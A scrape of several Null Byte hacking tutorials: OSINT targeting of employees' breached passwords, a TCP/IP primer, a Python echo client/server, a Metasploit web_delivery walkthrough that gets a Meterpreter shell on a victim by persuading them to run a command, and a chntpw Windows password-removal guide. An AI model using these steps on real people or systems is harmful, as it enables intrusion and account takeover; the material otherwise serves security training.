can find more information about the breaches the target employees were involved in by selecting the breaches we've discovered, and then enriching them further by right-clicking and typing "enrich" to show the breach enrichment options. Run both to learn details about the breach itself and details about the types of data lost in that particular breach.After running these transforms, we should see an expanded profile of information about each breach, including the specific date. Additionally, each breach will now include an element to indicate whether passwords, usernames, or other types of data were lost.So how can we filter to show only email addresses who have lost specific kinds of data? In this case, we want to find users who have had passwords lost. To this end, we can filter our results to only show emails who have lost this kind of data.In the pane on the right, we can select all the "Password" entities, as these are incidents in which actual passwords have been lost. Next, we can select "Add Parents" to add all of the elements that are connected as parent nodes to these elements. In this case, the breach is the parent node, and the "Passwords" element is the child node. Now, we have only breaches where passwords were lost selected.By clicking "Add Parents" one more time, we will add any email addresses that are connected to these breaches which have lost passwords. Now, we have a list of email addresses who have lost passwords in breaches and the specific information of when and how that information was breached.At this point, we have a targeted list of all employees involved in password breaches.Step 8: Discover Actual Passwords in Breached DatasetsDiscovering a breached password is relatively rare, but while demonstrating Maltego to a friend who is a TV executive, we were both surprised to find his old password in a Pastebin dump tied to his email address, sitting in plain text. Once you have a targeted email, discovering Pastebin dumps related to that email may contain much more information than just the email address.There are a few methods of discovering the actual password that was lost, but in general, this depends on whether the stolen passwords were in plain text, hashed, salted, or otherwise encrypted. If the passwords were stolen and dumped in plaintext, you can simply use the information contained in the enriched breach data to attempt to locate the data dump. A talented researcher can often find these sorts of dumps looking through GitHub and other common places for hacked data to be exchanged.If the passwords stolen were hashed, there is the possibility you couldcrack them, if this old password is of real value to you. By brute-forcing against some common hashing algorithms, it is possible to retrieve passwords from an old data breach if the password is contained in your dictionary file. Finding the name of the breach by looking in the enriched breach data is the first step to tracking down the actual information that was lost in the breach.In general, the target here is more to locate employees with relaxed security positions, and the actual data they lost is irrelevant unless it's easily accessible. If the password is easy to find, it is very helpful to know how the account owner has constructed their passwords in the past. Using tools like theMentalist, we can create similarly formatted passwords using the person's personal data to attempt to break into their account.Don't Miss:Create Custom Wordlists for Password Cracking Using the MentalistDefending Against OSINT-Based AttacksIf you've entered the same password you use on important accounts into any other account, you are vulnerable to this attack. You have no way of knowing how most companies you register accounts with store your password, so if they are lost in plaintext, any account with the same password is open to compromise.Twitter recently discovered they were saving everyone's password in plaintext, which means that any account you have with the same password as your Twitter account has a chance of being that much easier to break into. You can mitigate this by choosing unique passwords for each account you have. Passwords like "UniquePasswordMyspace" don't work because an attacker will just try "UniquePasswordGmail" and so on, so make sure it's truly different and doesn't follow a predictable pattern.Use apasswordmanagerto keep track of complicated unique passwords, and use a two-factor authentication method to ensure that stolen passwords are useless in other accounts. These best practices are your best defense against the standard attempts to breach an account a small amount of OSINT could enable.Don't Miss:How to Create Stronger Passwords (Advice from a Real Hacker)I hope you enjoyed this guide to locating employees involved in data breaches using OSINT research! If you have any questions about this tutorial or using Maltego for OSINT research, feel free to leave a comment or reach me on [email protected] Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Kody/Null ByteRelatedVideo:How to Use Maltego to Research & Mine Data Like an AnalystHow To:Use Maltego to Fingerprint an Entire Network Using Only a Domain NameHack Like a Pro:How to Use Maltego to Do Network ReconnaissanceHow To:Exploit Recycled Credentials with H8mail to Break into User AccountsReddit Breach:How to Check if Your Reddit Account Was CompromisedHow To:Scrape Target Email Addresses with TheHarvesterHow To:Conduct OSINT Recon on a Target Domain with Raccoon ScannerHack Like a Pro:How to Spy on Anyone, Part 2 (Finding & Downloading Confidential Documents)News:Augmented Reality App Maker Houzz Reveals Major Data BreachHow To:Cloak Your Private Email Address into an Anonymous, Disposable One with GliphHow To:Use Photon Scanner to Scrape Web OSINT DataHow To:Timehop Breach Impacts Everyone Who's Ever Used the App — Here's How to Check What Info Leaked About YouHow To:Use Maltego to Monitor Twitter for Disinformation CampaignsRecon:How to Research a Person or Organization Using the Operative FrameworkHow To:Hide @iCloud, @Me & Custom Aliases from Your Mail App's 'From' Field on Your iPhoneHow To:Find Hacked Accounts Online ~ PART 1 - haveibeenpwnedHow To:Purge Your Inbox of Account Passwords with Dashlane's Email Security ScannerHow To:You've Probably Let Several Apps Read Your Gmail — Here's How to See & Delete ThemHack Like a Pro:How to Extract Email Addresses from an SMTP ServerNews:Apple Says iPhone & iCloud Are Safe After Claimed Breach by 'Turkish Crime Family'How To:These Clever Gmail Hacks Will Stop Spam from Sites Who Sell Your Email AddressHow To:Use 'Sign in with Apple' on iOS 13 for Better Security & PrivacyHow To:Learn How Elliot from Mr. Robot Hacked into His Therapist's New Boyfriend's Email & Bank Accounts (Using Metasploit)How To:Block Contacts, Spam & Unknown Senders in iOS 13's Mail App So Incoming Emails Go Straight to TrashHow To:Use UFONetNews:Whoops! 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Hack Like a Pro: Networking Basics for the Aspiring Hacker, Part 2 (TCP/IP) « Null Byte :: WonderHowTo
Welcome back, my greenhorn hackers!Inthe first partofthis series, I introduced you to the basics of networking including IP addresses, ports, NAT, and DHCP. In this lesson, I want to introduce you to the basics of TCP/IP, i.e., Transmission Control Protocol (TCP) and Internet Protocol (IP). These are the most common protocols used on the internet for communication.Image viaShutterstockTo become a proficient hacker,forensic investigator, or simply be a good network engineer, you should understand the structure and anatomy of these protocols. From my experience,manyprofessionals in these fields do not understand the basics of TCP/IP, which means that you will definitely have an advantage over them if you do understand TCP/IP.When trying to create a new hacking tool or investigate a network attack, understanding these protocols and their fields is essential. Otherwise, you will be simply wasting your time.What Are Protocols?Protocols are simply an agreed upon way to communicate. For instance, we here on Null Byte have agreed upon the English language with all its rules and grammar as our way to communicate. That is our protocol. If we did not have an agreed upon way to communicate, people would be using many languages, grammar, and rules and none of us would understand each other.Protocols are similar. A protocol simply defines a way of communication with all its rules. These rules are usually defined by a RFC (Request for Comments).There are many, many protocols in use on the internet. These include TCP, IP, UDP, FTP, HTTP, SMTP, etc., and each has its own set of rules that must be complied with in order to communicate effectively (similar to the rules we use in communication via written languages). Probably the two most important protocols for use over the internet are IP and TCP, so let's take a look at each of these.IP (Internet Protocol)IP, or Internet Protocol, is the protocol that is used to define the source and destination IP address of a packet as it traverses the internet. It is often used in conjunction with other protocols such as TCP, hence the often used conjunction, TCP/IP.Let's take a look at an IP packet header and see what information itcontains that can be useful to the aspiring hacker and/or forensic investigator.Row 1Version: This defines the version of IP, either v4 or v6.IHL: Defines the header length.Type of Service (TOS): This defines the type of service of this packet. These include minimize delay, maximize throughput, maximize reliability, and minimize monetary cost.Total Length: This defines the total length of the IP datagram (including the data) or the fragment. Its maximum value is 65,535.Row 2Identification: This field uniquely identifies each packet. It can be critical in reassembling fragmented packets.IP Flags: This field defines whether the packet is fragmented (M) or not (D). The manipulation of the field can be used to evade IDS and firewalls. Check out my tutorials onNmapandHping3on how we can manipulate packets to evade intrusion detection systems and other security devices. It can also be used in conjunction with the Window field to identify the operating system of the sender.Fragment Offset: This field is used when packets are fragmented. It defines where the packets should be reassembled from the beginning of the IP header.Row 3TTL: This is the "time to live." This defines how many hops across the internet before the packet expires. It varies by operating system making it useful to identify the OS of the sender.Protocol: This field defines what protocol is being used with IP. Most often, it will be 6 or TCP, 1 for ICMP, 17 for UDP, among others.Header Checksum: This is an error checking field. It calculates the checksum (a simple algorithm) to determine the integrity of the data in the header.Rows 4 & 5Source / Destination: These rows of the IP header are probably the most important part of the header as it contains the source and destination IP address.Row 6Options: This field is variable length and its use is optional (as you might expect).Padding: This field is used to fill out, if necessary, the remaining bits and bytes of the header.TCP (Transmission Control Protocol)In the TCP header, there are numerous critical fields that the aspiring hacker and/or forensic investigator should understand.Row 1Source Port / Destination Port: Probably most importantly, these are the source port and destination port. These fields determine what port the communication came from and where it is going.Row 2Sequence Number: The sequence number is generated by the source machine's TCP stack and is used to make certain that packets are arranged in the proper sequence when they arrive. It is also important in defeatingMitM attacks.Row 3Acknowledgement Number: This is an echo of the Sequence Number sent back by the receiving system. It basically says, "I received the packet with the Sequence #." In this way, the sender knows that the packet arrived. If the sender does not receive an Acknowledgment Number back in a fixed amount of time, it will resend the packet to make certain the receiver gets the packet. In this way, TCP is reliable (for instance, UDP does not do this and is therefore unreliable).Row 4The fourth row has some critical information. Let's skip over theData Offsetand theReservedfields. That takes us to 8 bits near the middle of Row 4. These are the infamous flags of the three-way handshake andNmapscans. The first two bits,CWRandECE, are beyond the scope of this lesson. The next six bits are the URG, ACK, PSH, RST, SYN, and FIN flags. These flags are used by TCP to communicate;SYN: The opening of a new connection.FIN: The normal, soft closing of a connection.ACK: The acknowledgment of a packet. All packets after the three-way handshake should have this bit set.RST: The hard-close of a connection and usually used to communicate that the packet has arrived at the wrong port or IP.URG: This flag indicates that the following data is urgent.PSH: Push the data past the buffer to the application.If you are familiar withNmaporHping3asrecon tools, you have used scans utilizing all of these flags. By creating packets with flag combinations that should not be seen in the wild, we may be able to elicit a response from a very secure system or even evade detection.Window Size: In some diagrams, this is simply described as theWindowfield. Its role is to communicate the size of the window that the TCP stack has to buffer packets. This is the way that TCP manages flow control. From a recon or forensics perspective, this field alone can be enough to identify the OS that sent the packet. This field varies from OS to OS and even from SP to SP. Given this bit of information, one can predict with about 80% accuracy the OS that sent the packet. In fact, it is this field and a few others (DF and TTL in the IP header) that such operating system fingerprinters such asp0fuse to identify the OS.Row 5Checksum: This field uses a simple algorithm to check for errors. In essence, it is an integrity checker.URG Pointer: This field points to the last byte of the sequence number of urgent data. The URG flag must be set in conjunction to activate this field.Row 6Options: Like the IP header, the TCP header has an options field that can be used if necessary and it is varying length.Padding: The padding is necessary to bring the TCP header to a multiple of 32 bits.If you have any questions on these basics of TCP/IP, ask in the comments below and we'll try and help you understand better.Keep coming back, my greenhorn hackers, as we explorethe basics of networkingto make you a professional hacker!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hacker Fundamentals:A Tale of Two StandardsHow To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Networking Basics for the Aspiring Hacker, Part 1Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 10 (Identifying Signatures of a Port Scan & DoS Attack)Hack Like a Pro:How to Perform Stealthy Reconnaissance on a Protected NetworkHacker Fundamentals:The Everyman's Guide to How Network Packets Are Routed Across the WebHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 17 (Client DNS)How To:Create Packets from Scratch with Scapy for Scanning & DoSingHack Like a Pro:How to Conduct Passive OS Fingerprinting with p0fHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 4 (Evading Detection While DoSing)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 2 (Network Forensics)How To:Simplify Payload Creation with MSFPC (MSFvenom Payload Creator)Hack Like a Pro:How to Conduct Active Reconnaissance on Your Target with hping3Hack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHack Like a Pro:Advanced Nmap for ReconnaissanceHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItNews:8 Wireshark Filters Every Wiretapper Uses to Spy on Web Conversations and Surfing HabitsHow To:Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASHHow To:Code a Basic TCP/IP Client & Server Duo in PythonHacker Fundamentals:A Gentle Introduction to How IP Addresses WorkGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingHow To:Assign a Static IP Address in Windows 7Community Byte:HackThisSite Walkthrough, Part 1 - Legal Hacker TrainingHow To:Hack Wireless Router Passwords & Networks Using HydraCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 2 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker Training
How to Code a Basic TCP/IP Client & Server Duo in Python « Null Byte :: WonderHowTo
TCP/IP Client / Server ApplicationHello! Today's blog post will be about coding a very rudimentary Client and Server application duo, which will communicate by using TCP Sockets.It is, as illustrated, in principle, just two cans and a string that ties them together. The server will listen for clients and accept incoming data, while the client will, upon startup, check for the server on a predefined port and if found, will enable you to send messages! If not, it will simply exit with an exception.For a more substantial read about TCP/IP, refer tothis Wiki article. It should be sufficient and cover the basics of the model.RequirementsPythonStep1Server ApplicationThis is going to be our receiving end (no puns, please) of the duet.#!C:\python27 #Replace with usr/bin/ clause for Linuximport SocketServer #imports the socket server libraryclass EchoHandler( SocketServer.StreamRequestHandler ): #declares the classdef handle(self): #installs handlerinput= self.request.recv(1024) #defines request bufferprint "Input: %r" % ( input, ) #prints data receivedself.request.send("Received: %r" % ( input, ) ) #sends message to client saying..#.."message received"server= SocketServer.TCPServer( ("",7000), EchoHandler )#adds listener at port 7000print "Starting Server..."server.serve_forever() #enables the server to run forever as long as a client is connectedSimple enough, right?Step2Client ApplicationNow we will code the application which will enable us to send messages to the server.#!C:\python27import socketclass Client( object ): #defines client classrbufsize= -1 #sets read bufferwbufsize= 0 #sets write bufferdef __init__( self, address=('localhost',7000) ): #defines initialisation functionself.server=socket.socket( socket.AF_INET, socket.SOCK_STREAM )#initiates socket by passing address and protocol parametersself.server.connect( address ) # connects to set address and portself.rfile = self.server.makefile('rb', self.rbufsize) #makes file object for response processingself.wfile = self.server.makefile('wb', self.wbufsize) # same as above but for writing/response sendingdef makeRequest( self, text ): # request function which will handle the data transferself.wfile.write( text )data= # closes this instance of the connectionreturn dataprint "Connecting to Echo Server"i = 0 #from here to end of file, infinite loop for message sending to serverwhile (i > -1):c= Client()response = c.makeRequest(raw_input("Enter something: "))print repr(response)print "Finished"And that's it.End NotesFire up the "Server" app first, then launch the client and try sending some data.If all goes well, you should get the server to print out some received data. Hope you enjoy making these apps!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Reverse Shell Using PythonHow To:Program Your Own Little RAT (Part 1) Getting the Server WorkingHow To:Program Your Own Little RAT (Part 2) Getting the Client WorkingHacker Fundamentals:A Tale of Two StandardsHow To:Create Packets from Scratch with Scapy for Scanning & DoSingHow To:Advanced System Attacks - Total GuideHacking macOS:How to Create an Undetectable PayloadHow To:Create a Basic Client-Server Connection in C Part-1Hacking macOS:How to Create a Fake PDF Trojan with AppleScript, Part 1 (Creating the Stager)Hack Like a Pro:Networking Basics for the Aspiring Hacker, Part 2 (TCP/IP)How To:Make a Change-of-IP Notifier in PythonCommunity Byte:Coding an IRC Bot in Python (For Beginners)How To:Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASHHow To:Make a Gmail Notifier in PythonCommunity Byte:Coding a Web-Based Password Cracker in PythonNews:8 Wireshark Filters Every Wiretapper Uses to Spy on Web Conversations and Surfing HabitsNews:Learning Python 3.x as I go (Last Updated 6/72012)Community Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 7 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 3 - Legal Hacker TrainingHow To:Create an SSH Tunnel Server and Client in LinuxMastering Security, Part 2:How to Create a Home VPN TunnelWeekend Homework:How to Become a Null Byte Contributor (2/17/2012)How To:Things to Do on WonderHowTo (01/18 - 01/24)How To:Chain Proxies to Mask Your IP Address and Remain Anonymous on the WebNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Four: The Invisible InternetCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingUDP Flooding:How to Kick a Local User Off the NetworkCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsHow To:Send SMS Messages with PythonPygame:All You Need to Start Making Games in PythonHow To:Enable Code Syntax Highlighting for Python in the Nano Text EditorCommunity Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsGoodnight Byte:Coding an IRC Bot in Python (For Beginners)How To:Run an FTP Server from Home with Linux
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 12 (Web Delivery for Linux or Mac) « Null Byte :: WonderHowTo
Welcome back, my budding hackers!Metasploit, one of my favorite hacking/pentesting tools, has so many capabilities that even aftermy many tutorialson it, I have only scratched the surface of it capabilities. For instance, it can be used withNexposefor vulnerability scanning, withNmapfor port scanning, and with its numerous auxiliary modules, nearly unlimited other hacking related capabilities.Among the exploit modules, a category that we have not addressed are the web delivery exploits. These exploits enable us to open a web server on the attack system and then generate a simple script command that, when executed on the victim system, will open a Meterpreter shell on the target. This web delivery exploit can usePython, PHP, or the WindowsPowerShellscripts.Of course, it is your job to get the script on the target machine. This means that you will likely need to get physical access to the system or envelope the code into a seemingly innocuous-looking object that the victim will be enticed to execute.In this tutorial, we will exploit a Linux or Mac system. Since both are UNIX-like systems, they both have built-in Python interpreters by default. If we can get the script command generated by this exploit on the target, we can have complete control of the system including keystroke logging, turning on the webcam, recording from the microphone, and reading or deleting any files on the system.Let's get started.Step 1: Open a TerminalThe first step, of course, is to fire upKaliand open a terminal.Step 2: Start Metasploit & Load the ExploitNext, start Metasploit by typing:kali > msfconsoleThis should open the msfconsole like that below.Then we need to load the exploit:msf > use exploit/multi/script/web_deliverySet the IP of our attack system:msf > set LHOST set the port we want to use:msf > set LPORT 4444Of course, I am using my private IP address in my lab, but if the target is outside your LAN, you will likely need to use your public IP and then port forward.Step 3: Show OptionsNow that we have the exploit loaded and ready to go, let's take a look at the options for this exploit. Type:msf > show optionsIt looks like we have all the options set as we need. Now, let's get a bit more information on this exploit before we proceed. Type:msf > infoAs you can read above, this exploit starts a web server on our attack system and, when the command that is generated is executed on the target system, a payload is downloaded to victim. In addition, this attack does not write to disk, so it should not trigger theantivirus softwareon the victim's system.Step 4: Start the ExploitOur next step is to run the exploit. This starts the web server on our attack system and also generates a Python command that we can use to connect to this web server. Before we do that, though, we need to set the target to 0, selecting the Python exploit.msf > set target 0Now, we can type exploit:msf > exploitNotice the last thing this exploit writes is "Run the following command on the target machine" followed by the command we need to use. Copy this command.Step 5: Run the Command on the Victim SystemNext, take that command to the victim machine. In this case, I'm using an Ubuntu 14.04 system. You will need to precede the command withsudoas it requires root privileges.Then hitEnter. When you return to your Kali system, you can see a Meterpreter has been started on the target system! We own that box!Initially, the Meterpreter is running in the background. To bring it to the foreground, we can type:msf > sessions -lThis then lists the "active sessions." Notice that this session ID is "1." We then can activate that session by typing:msf > sessions - i 1This then brings the Meterpreter session to the foreground and we get the meterpreter prompt! To control the system, we can run the Meterpretercommandsorscripts, although most of the scripts are written for Windows systems.Keep coming back, my budding hackers, as we continue to explorethemost valuable skills of the 21st century—hacking!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHack Like a Pro:Metasploit for the Aspiring Hacker, Part 13 (Web Delivery for Windows)How to Hack Like a Pro:Getting Started with MetasploitNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)How To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Metasploit for the Aspiring Hacker, Part 14 (Creating Resource Script Files)Mac for Hackers:How to Install the Metasploit FrameworkHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHack Like a Pro:Metasploit for the Aspiring Hacker, Part 4 (Armitage)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)Mac for Hackers:How to Get Your Mac Ready for HackingNews:What to Expect from Null Byte in 2015Hack Like a Pro:Windows CMD Remote Commands for the Aspiring Hacker, Part 1Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 10 (Finding Deleted Webpages)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 22 (Samba)Hack Like a Pro:The Ultimate Command Cheat Sheet for Metasploit's MeterpreterHack Like a Pro:How Windows Can Be a Hacking Platform, Pt. 1 (Exploit Pack)Hack Like a Pro:How to Install BackTrack 5 (With Metasploit) as a Dual Boot Hacking SystemHack Like a Pro:Getting Started with BackTrack, Your New Hacking SystemHack Like a Pro:Metasploit for the Aspiring Hacker, Part 3 (Payloads)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 2 (Keywords)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 19 (Linking Files)Hack Like a Pro:How to Hack the Shellshock VulnerabilityHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 12 (Loadable Kernel Modules)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 8 (Setting Up a Fake SMB Server to Capture Domain Passwords)Hack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingHow To:How Hackers Take Your Encrypted Passwords & Crack ThemHow To:Chain VPNs for Complete AnonymityCommunity Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 4 - Real Hacking Simulations
Learn to Code Today with This $20 Web Development Course « Null Byte :: WonderHowTo
Learning to code is difficult, particularly if you're doing it alone. While coding may be amongthe most valued job skillsin many markets, the education is sometimes inaccessible.However, theIntroduction to Coding with HTML, CSS & JavaScriptcourse provides five hours of introductory content that can get you started coding with some of the most used languages available, and right now, it's on sale for $19.99 — a full 90% off.For many complex skills, the hardest part is just getting started. The barrier between knowing nothing and knowing enough to learn more can be insurmountable without expert help. This course is designed to give you the help you need to start programming, practicing, and growing. You will learn to code with HTML, CSS, and JavaScript, which are frequently used coding languages and among the more accessible ones to beginners.In 47 lectures spanning five hours of content, you will develop your problem-solving abilities, which applies to coding and any other job you may do. Instead of relying on clunky and unintuitive website builders that hide their best templates behind a paywall, you will be able to make your own professional or personal websites that suit your exact needs. Programmers tend to earn an average of $47 per hour, which is a significant leap compared to the US national average of alittle over $11.With your lifetime access to this course, you will be able to learn at your own pace or return to this class for reference. Use the programming knowledge you gain to build on. Once you know how to learn one coding language, the others will be easier, and from there, you can trulybecome a master programmer.You can get the Introduction to Coding with HTML, CSS & JavaScript coursenow for $19.99 while it's on salefor 90% off before it returns to its full price of $200.Prices subject to change.Learn More:Introduction to Coding with HTML, CSS & JavaScript for Just $19.99Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedDeal Alert:Learn to Code for Only $39 While You're Stuck at HomeHow To:Expand Your Coding Skill Set with This 10-Course Training BundleHow To:This Best-Selling Web Development Training Is on Sale for $12How To:Start Making Your Own Apps Today with This $20 BundleHow To:Become an In-Demand Web Developer with This $29 TrainingHow To:Expand Your Coding Skill Set by Learning How to Build Games in UnityHow To:Learn Python & AI with This $20 E-BookNews:The Best Black Friday 2017 Speaker Deals for Your SmartphoneHow To:Start 2021 with a New Coding Career with This Ultimate Set of Web Developer CoursesHow To:Learn How to Create Fun PC & Mobile Games for Under $30News:How-to Design Amazing Web Pages Using Basic HTMLHow To:Learn to Code Your Own Games with This Hands-on BundleHow To:Become a Productivity Master with Google Apps ScriptHow To:Start Learning How to Code in Just a WeekHow To:Become an In-Demand Data Scientist with 140+ Hours of TrainingHow To:Learn to Write Code from Scratch for Under $30How To:Find Out If Facebook Owes You Ten BucksHack Like a Pro:How to Build Your Own Exploits, Part 2 (Writing a Simple Buffer Overflow in C)How To:Web Development for Hackers 1.1: HTML,CSS,JSHow To:Enable Code Syntax Highlighting for Python in the Nano Text EditorHow To:This Master Course Bundle on Coding Is Just $34.99News:A Basic Website Crawler, in Python, in 12 Lines of Code.New Promo Code:Gobbler TranformationPygame:All You Need to Start Making Games in PythonNews:Symantec Source Code Released by Anon After Failed NegotiationsNews:Stanford's Cryptology Class Goes Live TODAY!Root Exploit:Memodipper Gets You Root Access to Systems Running Linux Kernel 2.6.39+News:Awesome Trick with Prepaid "GoPhones" Nabs You Free Text Messaging for LifeNews:Don Williamson's Real-Time Web-Based DCPU-16 Emulator & ASM Code EditorCommunity Contest:Code the Best Hacking Tool, Win Bragging Rights7/14-Weds pick:60 Watt Kid, Yellow Alex @ BandshellCommunity Byte:Coding a Web-Based Password Cracker in PythonLearn Java:Part OneHow To:Is Your Website Vulnerable to XSS Injections? Here's How to Protect Your VisitorsNews:In Just a Clik, Turn Your Smartphone into a YouTube Remote for Any Web DisplayHow Null Byte Injections Work:A History of Our NamesakeNews:***Minnie Mobber App***News:MAC-Using Gamemakers Rejoice! UDK Now Compatible With MAC OS XNews:Microsoft Office 2010 KeynoteHow To:Learn to Code for Only $40 with Learnable
How to Remove a Windows Password with a Linux Live CD « Null Byte :: WonderHowTo
Back when I was a Windows user, I know I'm not the only one who has experienced password loss—that moment where you just can't remember your password. Sometimes it happens to the best of us. So, how can we get into the system without paying a local geek or geeksquad to do it? First, we have to look into how Windows stores their passwords.When Windows saves your user passwords, it stores them in a SAM file. It stores users'passwordsin a hashed format (inLM hashandNTLMhash). Since ahash functionis one-way, this provides some measure of security for the storage of the passwords. However, this can still be bruteforced.Some time ago there was an exploit that allowed you to delete the SAM file and log into any account without a password. This is fixed, since Windows no longer allows access to the SAM file while Windows is running. For thisNull Byte, we are going to use a Linux Live CD to remove a Windows password using thechntpwtool.RequirementsBackTrack 5on a DVD, or a Linux install with chntpwA password on a Windows installationStep1Boot From BackTrackText in bold is a terminal command.Put the disc in your computer.Hit the the setup button.Change CD/DVD to be first on the boot order.Exit the setup and save your settings.When you get to the console, boot with;user:rootpaswword:toor.Boot into the KDE desktop environment:startxOpen a terminal.Step2Mount Drive & Change Windows PasswordNow we have to mount the Windows drive partition to modify the password, or remove it completely.First, wehave to mount the hard drive partition that the Windows installtion is located on..mount /dev/sda1 /mnt/Change to the directory that the SAM file is in so that we can prepare to modify its /mnt//Windows/System32/configList the users on the computer contained in the SAM file.chntpw -l SAMChange a specific user account password.chntpw -u USERNAME SAMNow, lets unmount the drive and boot from Windows to use the updated or cleared password.umount /dev/sda1If you have any questions regarding today's post, feel free to join us onIRC. Also, follow me onTwitterfor the latest Null Byte updates.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Recover Passwords for Windows PCs Using OphcrackHow To:Hack a Windows 7/8/10 Admin Account Password with Windows MagnifierHow To:Reset Windows Password with a Windows CD or a Linux CDHow To:Extract Windows Usernames, Passwords, Wi-Fi Keys & Other User Credentials with LaZagneHow To:Remove Ubuntu and the GRUB LoaderHow To:Bypass Windows Passwords Part 1How To:Bypass Locked Windows Computers to Run Kali Linux from a Live USBHow To:Remove a Password from Log in Screen in Linux MintHow To:Set Up Private Internet Access in LinuxHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)How to Hack Like a Pro:Getting Started with MetasploitHow To:Run Kali Linux as a Windows SubsystemHow To:Recover a Windows Password with OphcrackHow To:Bypass Windows and Linux PasswordsHow To:Recover WinRAR and Zip PasswordsHow To:Scan for Viruses in Windows Using a Linux Live CD/USBHow To:Run Windows from Inside LinuxNews:Complete Arch Linux Installation, Part 1: Install & 